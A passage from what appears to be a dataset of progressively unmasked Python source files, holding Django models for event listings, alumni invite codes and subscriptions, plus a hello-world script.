[watcher.mail_address for watcher in self.watch.all()]\n ml = member_addr + watcher_addr\n return ml\n\n def status(self):\n if self.event_status == 'N':\n return '募集中'\n if self.event_status == 'E':\n return 'イベント終了'\n else:\n return ''\n\n def datetimeForIndex(self):\n if self.event_datetime:\n return self.event_datetime\n if not self.question_date:\n return '未定'\n else:\n return 'アンケート中'\n\n def locationForIndex(self):\n if self.event_location:\n return self.event_location\n if not self.question_location:\n return '未定'\n else:\n return 'アンケート中'\n\n def oldstatus(self):\n if self.event_datetime < datetime.now():\n return 'old'\n else:\n return ''\n\n\n<mask token>\n", "step-5": "# coding: utf-8\nfrom datetime import datetime\n\n#from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils import timezone\nfrom persol_users.models import PersolUser\nfrom django.db.models import Q, Count\n\n# アンケート\nfrom questions.models import Question\n\n@python_2_unicode_compatible\nclass Person(models.Model):\n name = models.CharField(max_length=50)\n pass\n \n def __str__(self): \n return self.name\n\nclass Event(models.Model):\n STATUS_CHOICES = (\n (\"N\",\"募集中\"),\n (\"E\",\"募集終了\")\n )\n author = models.ForeignKey(PersolUser, verbose_name='作成者', related_name='author')\n event_name = models.CharField('イベントタイトル', max_length=200)\n event_image = models.ImageField('イメージ画像', upload_to='event_image', blank=True, null=True)\n event_datetime = models.DateTimeField('開催日時', null=True)\n event_location = models.CharField('開催場所', max_length=200, blank=True)\n num_of_members = models.IntegerField('募集人数')\n dead_line = models.DateField('募集締切日', blank=True,null=True)\n overview = models.TextField('イベント概要')\n# comment = models.ManyToManyField(Comment)\n like = models.ManyToManyField(PersolUser,verbose_name='いいね', related_name='like')\n watch = models.ManyToManyField(PersolUser,verbose_name='ウォッチ', related_name='Watch')\n members = models.ManyToManyField(PersolUser)\n search_tag = models.TextField('検索用タグ', blank=True, null=True)\n event_status = models.CharField('イベントステータス', max_length=1, choices=STATUS_CHOICES, blank=False, null=False, default='N')\n \n # アンケート\n question_date = models.OneToOneField(Question, related_name='event_date', blank=True, null=True)\n question_location = models.OneToOneField(Question, related_name='event_location', blank=True, null=True)\n \n \n def __str__(self): \n return self.event_name\n \n def nokori(self):\n now_member = self.members.count()\n return self.num_of_members - now_member\n\n def like_list(self):\n return self.like.all()\n \n def event_date(self):\n try:\n return self.event_datetime.strftime('%Y.%m.%d')\n except AttributeError:\n return \"\"\n\n def event_starttime(self):\n try:\n return self.event_datetime.strftime('%H:%M~')\n except AttributeError:\n return \"\"\n \n def nobreak_overview(self):\n return self.overview.replace(\"\\n\", \"\")\n \n \n # アンケート削除\n def question_delete(self, type):\n if type == 'd':\n q = self.question_date\n self.question_date = None\n elif type == 'l':\n q = self.question_location\n self.question_location = None\n \n if q:\n q.delete()\n \n # アンケート取得。なければデフォルト値のダミーアンケートを返す\n def question_date_or_dummy(self):\n qd = self.question_date\n if not qd:\n qd = Question.get_default_question('d')\n return qd\n \n def question_location_or_dummy(self):\n ql = self.question_location\n if not ql:\n ql = Question.get_default_question('l')\n return ql\n \n def mailing_list(self):\n member_addr=[member.mail_address for member in self.members.all()]\n watcher_addr=[watcher.mail_address for watcher in self.watch.all()]\n ml=member_addr+watcher_addr\n return ml\n \n def status(self):\n if self.event_status == \"N\": return \"募集中\"\n if self.event_status == \"E\": return \"イベント終了\"\n else:return \"\"\n\n def datetimeForIndex(self):\n if self.event_datetime:\n return self.event_datetime\n \n if not self.question_date:\n return \"未定\"\n else:\n return \"アンケート中\"\n\n def locationForIndex(self):\n if self.event_location:\n return self.event_location\n \n if not self.question_location:\n return \"未定\"\n else:\n return \"アンケート中\"\n \n def oldstatus(self):\n if self.event_datetime < datetime.now():\n return 'old'\n else:\n return ''\n\n\"\"\"\npython manage.py makemigrations\npython manage.py migrate\n\"\"\"", "step-ids": [ 11, 13, 15, 16, 21 ] }
[ 11, 13, 15, 16, 21 ]
import datetime from random import SystemRandom import re import string import time from django.db import models from django.utils import timezone from app.translit import translit # Each model extends models.Model class alumni(models.Model): alumnus_id = models.AutoField(primary_key=True) full_name = models.CharField(max_length=150) year = models.IntegerField() letter = models.CharField(max_length=2) add_time = models.DateTimeField(auto_now_add=True) added_by = models.CharField(max_length=50) class Meta: verbose_name = 'Alumnus' verbose_name_plural = 'Alumni' def __unicode__(self): return self.full_name + ", " + unicode(self.year) + self.letter class Application(models.Model): slug = models.SlugField() name = models.CharField(max_length=200) url = models.URLField() disabled = models.BooleanField(default=False) valid_for = models.PositiveIntegerField() def __unicode__(self): return self.slug class invites(models.Model): PREFIX = '57' STRENGTH = 16 STATUS_OK = 1 STATUS_DISABLED = 2 STATUS_BANNED = 3 STATUSES = ( (1, 'OK'), (2, 'DISABLED'), (3, 'BANNED'), ) code = models.CharField(max_length=255) alumni = models.ForeignKey(alumni) application = models.ForeignKey(Application, null=True, blank=True) add_time = models.DateTimeField(auto_now_add=True) status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK) disabled_at = models.DateTimeField(null=True, blank=True) expires_at = models.DateTimeField(null=True, blank=True) used_at = models.DateTimeField(null=True, blank=True) @classmethod def temporary_for(cls, invite, application, valid_for, session): try: new_code = invite_links.objects.get( code_from_id=invite.id, is_temporary_for=True, code_to__application_id=application.id ).code_to if valid_for is not None: new_code.ensure_expires_after(valid_for) return new_code except invite_links.DoesNotExist: pass if valid_for is None: valid_for = application.valid_for expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for) new_code = invites(application=application, alumni_id=invite.alumni_id, expires_at=expires_at, used_at=datetime.datetime.now()) new_code.code += '-' + application.slug new_code.save() link = invite_links(code_from=invite, code_to=new_code, session=session, is_temporary_for=True) link.save() return new_code def __init__(self, *args, **kwargs): super(invites, self).__init__(*args, **kwargs) if not self.code and self.alumni_id: code = [self.PREFIX, str(self.alumni.year) + translit(self.alumni.letter).lower()] full_name = re.sub(r'\([^)]*\)\s+', '', self.alumni.full_name) surname, name = full_name.split(' ', 1) code.append(translit(surname[:3]).lower() + translit(name[0]).lower()) csprng = SystemRandom() code.append(''.join(csprng.choice(string.digits) for _ in range(self.STRENGTH))) self.code = "-".join(code) class Meta: verbose_name = 'Invite' verbose_name_plural = 'Invites' def __unicode__(self): return unicode(self.code) + " (" + unicode(self.alumni) + ")" def safe_form(self): code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH-4) + self.code[-4:] return unicode(code) def is_enabled(self): return self.status == self.STATUS_OK def is_temporary(self): return self.application_id is not None def disable(self, at=None): if at is None: at = timezone.now() self.status = self.STATUS_DISABLED if at > timezone.now(): at = timezone.now() if self.disabled_at is None or self.disabled_at > at: self.disabled_at = at def merge_to(self, other_code, session): link = invite_links(code_from=self, code_to=other_code, is_merged_to=True, session=session) link.save() def verbose_status(self): if self.status == self.STATUS_OK: return 'ok' if self.status == self.STATUS_DISABLED: return 'disabled' if self.status == self.STATUS_BANNED: return 'banned' return None def expires_at_timestamp(self): if self.expires_at is not None: return time.mktime(self.expires_at.timetuple()) return None def ensure_expires_after(self, valid_for): expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for) if expires_at > self.expires_at: self.expires_at = expires_at self.save() class invite_links(models.Model): code_to = models.ForeignKey(invites, related_name="invite_links_to") code_from = models.ForeignKey(invites, related_name="invite_links_from") is_issued_by = models.BooleanField(default=False) is_merged_to = models.BooleanField(default=False) is_temporary_for = models.BooleanField(default=False) add_time = models.DateTimeField(auto_now_add=True) session = models.CharField(max_length=100, null=True, blank=True) class Meta: verbose_name = 'Invite link' verbose_name_plural = 'Invite links' def __unicode__(self): return unicode(self.code_from) + " -> " + unicode(self.code_to) # class Usage(models.Model): # code = models.ForeignKey(invites)
normal
{ "blob_id": "192e789129a51aa646a925fc4f8c3f8f4e14d478", "index": 7988, "step-1": "<mask token>\n\n\nclass invites(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs):\n super(invites, self).__init__(*args, **kwargs)\n if not self.code and self.alumni_id:\n code = [self.PREFIX, str(self.alumni.year) + translit(self.\n alumni.letter).lower()]\n full_name = re.sub('\\\\([^)]*\\\\)\\\\s+', '', self.alumni.full_name)\n surname, name = full_name.split(' ', 1)\n code.append(translit(surname[:3]).lower() + translit(name[0]).\n lower())\n csprng = SystemRandom()\n code.append(''.join(csprng.choice(string.digits) for _ in range\n (self.STRENGTH)))\n self.code = '-'.join(code)\n\n\n class Meta:\n verbose_name = 'Invite'\n verbose_name_plural = 'Invites'\n\n def __unicode__(self):\n return unicode(self.code) + ' (' + unicode(self.alumni) + ')'\n\n def safe_form(self):\n code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH - 4\n ) + self.code[-4:]\n return unicode(code)\n\n def is_enabled(self):\n return self.status == self.STATUS_OK\n\n def is_temporary(self):\n return self.application_id is not None\n\n def disable(self, at=None):\n if at is None:\n at = timezone.now()\n self.status = self.STATUS_DISABLED\n if at > timezone.now():\n at = timezone.now()\n if self.disabled_at is None or self.disabled_at > at:\n self.disabled_at = at\n\n def merge_to(self, other_code, session):\n link = invite_links(code_from=self, code_to=other_code,\n is_merged_to=True, session=session)\n link.save()\n\n def verbose_status(self):\n if self.status == self.STATUS_OK:\n return 'ok'\n if self.status == self.STATUS_DISABLED:\n return 'disabled'\n if self.status == self.STATUS_BANNED:\n return 'banned'\n return None\n <mask token>\n\n def ensure_expires_after(self, valid_for):\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n if expires_at > self.expires_at:\n self.expires_at = expires_at\n self.save()\n\n\nclass invite_links(models.Model):\n code_to = models.ForeignKey(invites, related_name='invite_links_to')\n code_from = models.ForeignKey(invites, related_name='invite_links_from')\n is_issued_by = models.BooleanField(default=False)\n is_merged_to = models.BooleanField(default=False)\n is_temporary_for = models.BooleanField(default=False)\n add_time = models.DateTimeField(auto_now_add=True)\n session = models.CharField(max_length=100, null=True, blank=True)\n\n\n class Meta:\n verbose_name = 'Invite link'\n verbose_name_plural = 'Invite links'\n\n def __unicode__(self):\n return unicode(self.code_from) + ' -> ' + unicode(self.code_to)\n", "step-2": "<mask token>\n\n\nclass invites(models.Model):\n PREFIX = '57'\n STRENGTH = 16\n STATUS_OK = 1\n STATUS_DISABLED = 2\n STATUS_BANNED = 3\n STATUSES = (1, 'OK'), (2, 'DISABLED'), (3, 'BANNED')\n code = models.CharField(max_length=255)\n alumni = models.ForeignKey(alumni)\n application = models.ForeignKey(Application, null=True, blank=True)\n add_time = models.DateTimeField(auto_now_add=True)\n status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)\n disabled_at = models.DateTimeField(null=True, blank=True)\n expires_at = models.DateTimeField(null=True, blank=True)\n used_at = models.DateTimeField(null=True, blank=True)\n\n @classmethod\n def temporary_for(cls, invite, application, valid_for, session):\n try:\n new_code = invite_links.objects.get(code_from_id=invite.id,\n is_temporary_for=True, code_to__application_id=application.id\n ).code_to\n if valid_for is not None:\n new_code.ensure_expires_after(valid_for)\n return new_code\n except invite_links.DoesNotExist:\n pass\n if valid_for is None:\n valid_for = application.valid_for\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n new_code = invites(application=application, alumni_id=invite.\n alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())\n new_code.code += '-' + application.slug\n new_code.save()\n link = invite_links(code_from=invite, code_to=new_code, session=\n session, is_temporary_for=True)\n link.save()\n return new_code\n\n def __init__(self, *args, **kwargs):\n super(invites, self).__init__(*args, **kwargs)\n if not self.code and self.alumni_id:\n code = [self.PREFIX, str(self.alumni.year) + translit(self.\n alumni.letter).lower()]\n full_name = re.sub('\\\\([^)]*\\\\)\\\\s+', '', self.alumni.full_name)\n surname, name = full_name.split(' ', 1)\n code.append(translit(surname[:3]).lower() + translit(name[0]).\n lower())\n csprng = SystemRandom()\n code.append(''.join(csprng.choice(string.digits) for _ in range\n (self.STRENGTH)))\n self.code = '-'.join(code)\n\n\n class Meta:\n verbose_name = 'Invite'\n verbose_name_plural = 'Invites'\n\n def __unicode__(self):\n return unicode(self.code) + ' (' + unicode(self.alumni) + ')'\n\n def safe_form(self):\n code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH - 4\n ) + self.code[-4:]\n return unicode(code)\n\n def is_enabled(self):\n return self.status == self.STATUS_OK\n\n def is_temporary(self):\n return self.application_id is not None\n\n def disable(self, at=None):\n if at is None:\n at = timezone.now()\n self.status = self.STATUS_DISABLED\n if at > timezone.now():\n at = timezone.now()\n if self.disabled_at is None or self.disabled_at > at:\n self.disabled_at = at\n\n def merge_to(self, other_code, session):\n link = invite_links(code_from=self, code_to=other_code,\n is_merged_to=True, session=session)\n link.save()\n\n def verbose_status(self):\n if self.status == self.STATUS_OK:\n return 'ok'\n if self.status == self.STATUS_DISABLED:\n return 'disabled'\n if self.status == self.STATUS_BANNED:\n return 'banned'\n return None\n\n def expires_at_timestamp(self):\n if self.expires_at is not None:\n return time.mktime(self.expires_at.timetuple())\n return None\n\n def ensure_expires_after(self, valid_for):\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n if expires_at > self.expires_at:\n self.expires_at = expires_at\n self.save()\n\n\nclass invite_links(models.Model):\n code_to = models.ForeignKey(invites, related_name='invite_links_to')\n code_from = models.ForeignKey(invites, related_name='invite_links_from')\n is_issued_by = models.BooleanField(default=False)\n is_merged_to = models.BooleanField(default=False)\n is_temporary_for = models.BooleanField(default=False)\n add_time = models.DateTimeField(auto_now_add=True)\n session = models.CharField(max_length=100, null=True, blank=True)\n\n\n class Meta:\n verbose_name = 'Invite link'\n verbose_name_plural = 'Invite links'\n\n def __unicode__(self):\n return unicode(self.code_from) + ' -> ' + unicode(self.code_to)\n", "step-3": "<mask token>\n\n\nclass Application(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __unicode__(self):\n return self.slug\n\n\nclass invites(models.Model):\n PREFIX = '57'\n STRENGTH = 16\n STATUS_OK = 1\n STATUS_DISABLED = 2\n STATUS_BANNED = 3\n STATUSES = (1, 'OK'), (2, 'DISABLED'), (3, 'BANNED')\n code = models.CharField(max_length=255)\n alumni = models.ForeignKey(alumni)\n application = models.ForeignKey(Application, null=True, blank=True)\n add_time = models.DateTimeField(auto_now_add=True)\n status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)\n disabled_at = models.DateTimeField(null=True, blank=True)\n expires_at = models.DateTimeField(null=True, blank=True)\n used_at = models.DateTimeField(null=True, blank=True)\n\n @classmethod\n def temporary_for(cls, invite, application, valid_for, session):\n try:\n new_code = invite_links.objects.get(code_from_id=invite.id,\n is_temporary_for=True, code_to__application_id=application.id\n ).code_to\n if valid_for is not None:\n new_code.ensure_expires_after(valid_for)\n return new_code\n except invite_links.DoesNotExist:\n pass\n if valid_for is None:\n valid_for = application.valid_for\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n new_code = invites(application=application, alumni_id=invite.\n alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())\n new_code.code += '-' + application.slug\n new_code.save()\n link = invite_links(code_from=invite, code_to=new_code, session=\n session, is_temporary_for=True)\n link.save()\n return new_code\n\n def __init__(self, *args, **kwargs):\n super(invites, self).__init__(*args, **kwargs)\n if not self.code and self.alumni_id:\n code = [self.PREFIX, str(self.alumni.year) + translit(self.\n alumni.letter).lower()]\n full_name = re.sub('\\\\([^)]*\\\\)\\\\s+', '', self.alumni.full_name)\n surname, name = full_name.split(' ', 1)\n code.append(translit(surname[:3]).lower() + translit(name[0]).\n lower())\n csprng = SystemRandom()\n code.append(''.join(csprng.choice(string.digits) for _ in range\n (self.STRENGTH)))\n self.code = '-'.join(code)\n\n\n class Meta:\n verbose_name = 'Invite'\n verbose_name_plural = 'Invites'\n\n def __unicode__(self):\n return unicode(self.code) + ' (' + unicode(self.alumni) + ')'\n\n def safe_form(self):\n code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH - 4\n ) + self.code[-4:]\n return unicode(code)\n\n def is_enabled(self):\n return self.status == self.STATUS_OK\n\n def is_temporary(self):\n return self.application_id is not None\n\n def disable(self, at=None):\n if at is None:\n at = timezone.now()\n self.status = self.STATUS_DISABLED\n if at > timezone.now():\n at = timezone.now()\n if self.disabled_at is None or self.disabled_at > at:\n self.disabled_at = at\n\n def merge_to(self, other_code, session):\n link = invite_links(code_from=self, code_to=other_code,\n is_merged_to=True, session=session)\n link.save()\n\n def verbose_status(self):\n if self.status == self.STATUS_OK:\n return 'ok'\n if self.status == self.STATUS_DISABLED:\n return 'disabled'\n if self.status == self.STATUS_BANNED:\n return 'banned'\n return None\n\n def expires_at_timestamp(self):\n if self.expires_at is not None:\n return time.mktime(self.expires_at.timetuple())\n return None\n\n def ensure_expires_after(self, valid_for):\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n if expires_at > self.expires_at:\n self.expires_at = expires_at\n self.save()\n\n\nclass invite_links(models.Model):\n code_to = models.ForeignKey(invites, related_name='invite_links_to')\n code_from = models.ForeignKey(invites, related_name='invite_links_from')\n is_issued_by = models.BooleanField(default=False)\n is_merged_to = models.BooleanField(default=False)\n is_temporary_for = models.BooleanField(default=False)\n add_time = models.DateTimeField(auto_now_add=True)\n session = models.CharField(max_length=100, null=True, blank=True)\n\n\n class Meta:\n verbose_name = 'Invite link'\n verbose_name_plural = 'Invite links'\n\n def __unicode__(self):\n return unicode(self.code_from) + ' -> ' + unicode(self.code_to)\n", "step-4": "<mask token>\n\n\nclass alumni(models.Model):\n alumnus_id = models.AutoField(primary_key=True)\n full_name = models.CharField(max_length=150)\n year = models.IntegerField()\n letter = models.CharField(max_length=2)\n add_time = models.DateTimeField(auto_now_add=True)\n added_by = models.CharField(max_length=50)\n\n\n class Meta:\n verbose_name = 'Alumnus'\n verbose_name_plural = 'Alumni'\n\n def __unicode__(self):\n return self.full_name + ', ' + unicode(self.year) + self.letter\n\n\nclass Application(models.Model):\n slug = models.SlugField()\n name = models.CharField(max_length=200)\n url = models.URLField()\n disabled = models.BooleanField(default=False)\n valid_for = models.PositiveIntegerField()\n\n def __unicode__(self):\n return self.slug\n\n\nclass invites(models.Model):\n PREFIX = '57'\n STRENGTH = 16\n STATUS_OK = 1\n STATUS_DISABLED = 2\n STATUS_BANNED = 3\n STATUSES = (1, 'OK'), (2, 'DISABLED'), (3, 'BANNED')\n code = models.CharField(max_length=255)\n alumni = models.ForeignKey(alumni)\n application = models.ForeignKey(Application, null=True, blank=True)\n add_time = models.DateTimeField(auto_now_add=True)\n status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)\n disabled_at = models.DateTimeField(null=True, blank=True)\n expires_at = models.DateTimeField(null=True, blank=True)\n used_at = models.DateTimeField(null=True, blank=True)\n\n @classmethod\n def temporary_for(cls, invite, application, valid_for, session):\n try:\n new_code = invite_links.objects.get(code_from_id=invite.id,\n is_temporary_for=True, code_to__application_id=application.id\n ).code_to\n if valid_for is not None:\n new_code.ensure_expires_after(valid_for)\n return new_code\n except invite_links.DoesNotExist:\n pass\n if valid_for is None:\n valid_for = application.valid_for\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n new_code = invites(application=application, alumni_id=invite.\n alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())\n new_code.code += '-' + application.slug\n new_code.save()\n link = invite_links(code_from=invite, code_to=new_code, session=\n session, is_temporary_for=True)\n link.save()\n return new_code\n\n def __init__(self, *args, **kwargs):\n super(invites, self).__init__(*args, **kwargs)\n if not self.code and self.alumni_id:\n code = [self.PREFIX, str(self.alumni.year) + translit(self.\n alumni.letter).lower()]\n full_name = re.sub('\\\\([^)]*\\\\)\\\\s+', '', self.alumni.full_name)\n surname, name = full_name.split(' ', 1)\n code.append(translit(surname[:3]).lower() + translit(name[0]).\n lower())\n csprng = SystemRandom()\n code.append(''.join(csprng.choice(string.digits) for _ in range\n (self.STRENGTH)))\n self.code = '-'.join(code)\n\n\n class Meta:\n verbose_name = 'Invite'\n verbose_name_plural = 'Invites'\n\n def __unicode__(self):\n return unicode(self.code) + ' (' + unicode(self.alumni) + ')'\n\n def safe_form(self):\n code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH - 4\n ) + self.code[-4:]\n return unicode(code)\n\n def is_enabled(self):\n return self.status == self.STATUS_OK\n\n def is_temporary(self):\n return self.application_id is not None\n\n def disable(self, at=None):\n if at is None:\n at = timezone.now()\n self.status = self.STATUS_DISABLED\n if at > timezone.now():\n at = timezone.now()\n if self.disabled_at is None or self.disabled_at > at:\n self.disabled_at = at\n\n def merge_to(self, other_code, session):\n link = invite_links(code_from=self, code_to=other_code,\n is_merged_to=True, session=session)\n link.save()\n\n def verbose_status(self):\n if self.status == self.STATUS_OK:\n return 'ok'\n if self.status == self.STATUS_DISABLED:\n return 'disabled'\n if self.status == self.STATUS_BANNED:\n return 'banned'\n return None\n\n def expires_at_timestamp(self):\n if self.expires_at is not None:\n return time.mktime(self.expires_at.timetuple())\n return None\n\n def ensure_expires_after(self, valid_for):\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=\n valid_for)\n if expires_at > self.expires_at:\n self.expires_at = expires_at\n self.save()\n\n\nclass invite_links(models.Model):\n code_to = models.ForeignKey(invites, related_name='invite_links_to')\n code_from = models.ForeignKey(invites, related_name='invite_links_from')\n is_issued_by = models.BooleanField(default=False)\n is_merged_to = models.BooleanField(default=False)\n is_temporary_for = models.BooleanField(default=False)\n add_time = models.DateTimeField(auto_now_add=True)\n session = models.CharField(max_length=100, null=True, blank=True)\n\n\n class Meta:\n verbose_name = 'Invite link'\n verbose_name_plural = 'Invite links'\n\n def __unicode__(self):\n return unicode(self.code_from) + ' -> ' + unicode(self.code_to)\n", "step-5": "import datetime\nfrom random import SystemRandom\nimport re\nimport string\nimport time\n\nfrom django.db import models\nfrom django.utils import timezone\n\nfrom app.translit import translit\n\n\n# Each model extends models.Model\nclass alumni(models.Model):\n alumnus_id = models.AutoField(primary_key=True)\n full_name = models.CharField(max_length=150)\n year = models.IntegerField()\n letter = models.CharField(max_length=2)\n add_time = models.DateTimeField(auto_now_add=True)\n added_by = models.CharField(max_length=50)\n\n class Meta:\n verbose_name = 'Alumnus'\n verbose_name_plural = 'Alumni'\n\n def __unicode__(self):\n return self.full_name + \", \" + unicode(self.year) + self.letter\n\n\nclass Application(models.Model):\n slug = models.SlugField()\n name = models.CharField(max_length=200)\n url = models.URLField()\n disabled = models.BooleanField(default=False)\n valid_for = models.PositiveIntegerField()\n\n def __unicode__(self):\n return self.slug\n\n\nclass invites(models.Model):\n PREFIX = '57'\n STRENGTH = 16\n STATUS_OK = 1\n STATUS_DISABLED = 2\n STATUS_BANNED = 3\n STATUSES = (\n (1, 'OK'),\n (2, 'DISABLED'),\n (3, 'BANNED'),\n )\n\n code = models.CharField(max_length=255)\n alumni = models.ForeignKey(alumni)\n application = models.ForeignKey(Application, null=True, blank=True)\n add_time = models.DateTimeField(auto_now_add=True)\n status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)\n disabled_at = models.DateTimeField(null=True, blank=True)\n expires_at = models.DateTimeField(null=True, blank=True)\n used_at = models.DateTimeField(null=True, blank=True)\n\n @classmethod\n def temporary_for(cls, invite, application, valid_for, session):\n try:\n new_code = invite_links.objects.get(\n code_from_id=invite.id,\n is_temporary_for=True,\n code_to__application_id=application.id\n ).code_to\n if valid_for is not None:\n new_code.ensure_expires_after(valid_for)\n return new_code\n except invite_links.DoesNotExist:\n pass\n\n if valid_for is None:\n valid_for = application.valid_for\n\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)\n new_code = invites(application=application, alumni_id=invite.alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())\n new_code.code += '-' + application.slug\n new_code.save()\n link = invite_links(code_from=invite, code_to=new_code, session=session, is_temporary_for=True)\n link.save()\n return new_code\n\n def __init__(self, *args, **kwargs):\n super(invites, self).__init__(*args, **kwargs)\n if not self.code and self.alumni_id:\n code = [self.PREFIX, str(self.alumni.year) + translit(self.alumni.letter).lower()]\n full_name = re.sub(r'\\([^)]*\\)\\s+', '', self.alumni.full_name)\n surname, name = full_name.split(' ', 1)\n code.append(translit(surname[:3]).lower() + translit(name[0]).lower())\n csprng = SystemRandom()\n code.append(''.join(csprng.choice(string.digits) for _ in range(self.STRENGTH)))\n self.code = \"-\".join(code)\n\n class Meta:\n verbose_name = 'Invite'\n verbose_name_plural = 'Invites'\n\n def __unicode__(self):\n return unicode(self.code) + \" (\" + unicode(self.alumni) + \")\"\n\n def safe_form(self):\n code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH-4) + self.code[-4:]\n return unicode(code)\n\n def is_enabled(self):\n return self.status == self.STATUS_OK\n\n def is_temporary(self):\n return self.application_id is not None\n\n def disable(self, at=None):\n if at is None:\n at = timezone.now()\n\n self.status = self.STATUS_DISABLED\n if at > timezone.now():\n at = timezone.now()\n if self.disabled_at is None or self.disabled_at > at:\n self.disabled_at = at\n\n def merge_to(self, other_code, session):\n link = invite_links(code_from=self, code_to=other_code, is_merged_to=True, session=session)\n link.save()\n\n def verbose_status(self):\n if self.status == self.STATUS_OK:\n return 'ok'\n if self.status == self.STATUS_DISABLED:\n return 'disabled'\n if self.status == self.STATUS_BANNED:\n return 'banned'\n return None\n\n def expires_at_timestamp(self):\n if self.expires_at is not None:\n return time.mktime(self.expires_at.timetuple())\n return None\n\n def ensure_expires_after(self, valid_for):\n expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)\n if expires_at > self.expires_at:\n self.expires_at = expires_at\n self.save()\n\n\nclass invite_links(models.Model):\n code_to = models.ForeignKey(invites, related_name=\"invite_links_to\")\n code_from = models.ForeignKey(invites, related_name=\"invite_links_from\")\n is_issued_by = models.BooleanField(default=False)\n is_merged_to = models.BooleanField(default=False)\n is_temporary_for = models.BooleanField(default=False)\n add_time = models.DateTimeField(auto_now_add=True)\n session = models.CharField(max_length=100, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Invite link'\n verbose_name_plural = 'Invite links'\n\n def __unicode__(self):\n return unicode(self.code_from) + \" -> \" + unicode(self.code_to)\n\n\n# class Usage(models.Model):\n# code = models.ForeignKey(invites)\n", "step-ids": [ 13, 16, 18, 22, 24 ] }
[ 13, 16, 18, 22, 24 ]
""" Prog: helloworld.py Name: Samuel doyle Date: 18/04/18 Desc: My first program! """ print('Hello, world!')
normal
{ "blob_id": "513a2bbcf7a63baf900b73b18cf25618937dc7d0", "index": 1054, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('Hello, world!')\n", "step-3": "\"\"\"\nProg: helloworld.py\nName: Samuel doyle\nDate: 18/04/18\nDesc: My first program!\n\"\"\"\n\nprint('Hello, world!')\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='Member', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('email', models.EmailField(max_length=75)), ('total_subscription', models.IntegerField(default=0)), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='MemberSubscription', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('member', models.ForeignKey(to='members.Member')), ], options={ }, bases=(models.Model,), ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('subreddit', models.CharField(max_length=200)), ('count', models.IntegerField(default=5)), ], options={ }, bases=(models.Model,), ), migrations.AlterUniqueTogether( name='subscription', unique_together=set([('subreddit', 'count')]), ), migrations.AddField( model_name='membersubscription', name='subscription', field=models.ForeignKey(to='members.Subscription'), preserve_default=True, ), migrations.AddField( model_name='member', name='subscription', field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'), preserve_default=True, ), ]
normal
{ "blob_id": "4e383130b185c6147315517d166ffe66be1be40d", "index": 4577, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = []\n operations = [migrations.CreateModel(name='Member', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n 